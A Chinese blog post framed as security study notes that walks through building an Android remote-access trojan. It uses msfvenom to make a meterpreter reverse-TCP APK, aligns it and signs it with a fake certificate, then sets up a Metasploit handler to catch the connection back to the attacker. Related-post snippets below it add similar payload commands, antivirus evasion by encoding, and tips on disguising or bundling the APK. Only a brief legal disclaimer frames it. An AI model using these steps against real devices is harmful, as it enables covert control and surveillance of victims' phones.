网安学习笔记 6 ---- 安卓木马软件的使用(复杂版)

已于 2023-09-12 19:40:57 修改
阅读量684 收藏 8
点赞数 2
分类专栏: 渗透操作类 文章标签: 学习 笔记
于 2023-09-12 18:08:35 首次发布
1
本文链接:https://blog.csdn.net/ymy13326056686/article/details/132831966
版权

2023.9.12

注意:在进行安全研究和学习时,请确保遵循相关法律法规并获得授权,以避免非法操作或侵犯他人隐私。这些步骤仅供学习和研究使用,不得用于非法用途。

一、生成文件 

1、利用 kali 的工具 msfvenom 生成一个木马文件

msfvenom -p android/meterpreter/reverse_tcp lhost=<kali ip> lport=<自定义端口> R > muma.apk

二、重新对齐、签名

1、赋予apk文件权限

chmod -R 777 muma.apk

ps:查看文件权限

ll muma.apk

2、安装 zipalign

apt-get install zipalign

3、重新对apk文件进行对齐,签名成一个新的apk文件

zipalign -v 4 muma.apk new_muma.apk

4、生成密钥对

keytool -genkey -v -keystore <密钥库名> -alias <密钥别名> -keyalg RSA -keysize <秘钥位数> -validity <有效天数>

5、安装证书签名命令

apt-get install apksigner

 6、对 apk 签名  ps:做假证书签名的时候要输入之前做的假证书的密码

apksigner sign --ks <密钥库名> --ks-key-alias <密钥别名> <木马文件名>

7、验证签名

apksigner verify -v --print-certs <木马文件名>

三、测试 

1、msf模块运行

msfconsole
use exploit/multi/handler
set payload  android/meterpreter/reverse_tcp
set lhost <kali ip>
set lport <和木马软件的端口一样>
run

Z时代.bug(゜▽゜*)
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
msf生成木马攻击android手机
afei001
03-21 6624
实验环境 攻击机:kali IP:192.168.43.5 靶机:oppor9st 生成木马攻击android手机 1.在kali上生成反弹木马 root@afei:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.5 lport=6666 R > hello.apk [...
msfvenom生成木马的简单利用
xj28555的博客
08-10 5597
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lpor.
我的MSF之Android木马渗透的学习笔记
yuan_boss的博客
06-07 4521
使用kali制作Android木马并进行通讯录渗透的学习笔记
使用msf工具对安卓手机进行渗透攻击———超详细
热门推荐
weixin_71669458的博客
07-28 1万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
MSF手机渗透实验
weixin_63204687的博客
10-22 4290
可真刑,太可拷了
Kali Linux利用MSF入侵安卓手机
weixin_42916109的博客
06-06 6269
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行。我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机
Ho1aAs‘s Blog
07-29 6219
文章目录一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式三、msfconsole控制感染对象Ⅰ、电脑端示例:`shell`获取Windows的CMDⅡ、移动端示例:`webcam_stream`获取Android摄像头实时画面完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole msfvenom Windows Se
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 8853
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此本)虚拟机2. kali虚拟机建议使用最新本并将系统软件更新至最新本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
软件测试-软件测试视频教程学习笔记.zip
04-07
软件测试-软件测试视频教程学习笔记.zip软件测试-软件测试视频教程学习笔记.zip软件测试-软件测试视频教程学习笔记.zip软件测试-软件测试视频教程学习笔记.zip软件测试-软件测试视频教程学习笔记.zip软件测试-软件...
android学习笔记-clip.pdf
11-15
android学习笔记-clip.pdf
木马与病毒
03-26
今时今日,一直都有不少的人以为木马和病毒没什么区别,只要安装了杀毒软件,那么就万事无忧了。其实,木马并不等同于病毒,杀毒软件未必就能将隐藏的木马抓出来。下面,我们先来了解下木马与病毒的定义。
《WebGL编程指南》学习笔记webgl-study-notes
01-12
《WebGL编程指南》学习笔记webgl-study-notes
Cadence学习笔记1-原理图.pdf
11-16
Cadence学习笔记1-原理图.pdf
2021Kali -- 木马免杀制作
weixin_41489908的博客
04-24 3947
​知道为什么梦里的人都看不清脸么?因为怕你当真。。。 ---- 网易云热评 一、通过MSF生成shellcode 1、启动MSF,演示本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.139.133 lport=8585 -f c -p:指定payload -e:指定选择使用的编码 ...
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8156
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
kali安卓手机木马远控
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
msf生成免杀木马
qq_56426046的博客
09-08 5525
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
Python编程学习第一篇——Python零基础快速入门(六)(4)异常处理
最新发布
urhero的专栏
07-25 377
我们已经了解了Python的基本数据类型、变量和基本的逻辑控制语句,基于这些基础知识可以编写一些小程序了,但是在写程序的时候我们会发现,有时候程序并不是按我们预期的方向执行,有的直接报错,有的没有报错,却并未得到我们预期的结果。在这个例子中,除数为0会引发ZeroDivisionError异常,我们将异常信息赋值给变量e,并输出"除数不能为0"和异常信息。在这个例子中,由于除数不为0,所以没有发生ZeroDivisionError异常,代码会执行else语句块,并输出结果2.0。
网安学习笔记 1 ---- ms17-010 的复现
09-10
网安学习笔记中提到了复现ms17-010漏洞的方法。具体步骤如下: 1. 首先,需要获取目标服务器的IP地址和端口号。可以使用arp命令查看目标服务器的arp表来获取IP地址,如"arp -a"命令。 2. 下一步是获取目标服务器的shell访问权限。可以使用各种方法获取shell,比如通过网络钓鱼、漏洞利用等方式。具体方法可以根据目标服务器的情况来选择。 3. 一旦获得了目标服务器的shell访问权限,就可以开始复现ms17-010漏洞了。该漏洞是指Windows操作系统中的一个远程代码执行漏洞,可以通过发送特制的SMBv1请求来实现。具体的复现步骤可以参考网安学习笔记中提供的详细说明。 4. 在复现ms17-010漏洞之后,可以尝试进行服务器提权操作。提权是指获取目标服务器更高权限的操作,可以使用各种方法和工具来实现。具体的服务器提权方法可以根据目标服务器的操作系统和环境来选择。 请注意,复现ms17-010漏洞是为了学习和研究安全性,应在合法的环境和授权下进行。未经授权的测试和攻击是违法行为,会对他人造成损害和法律责任。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Z时代.bug(゜▽゜*)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值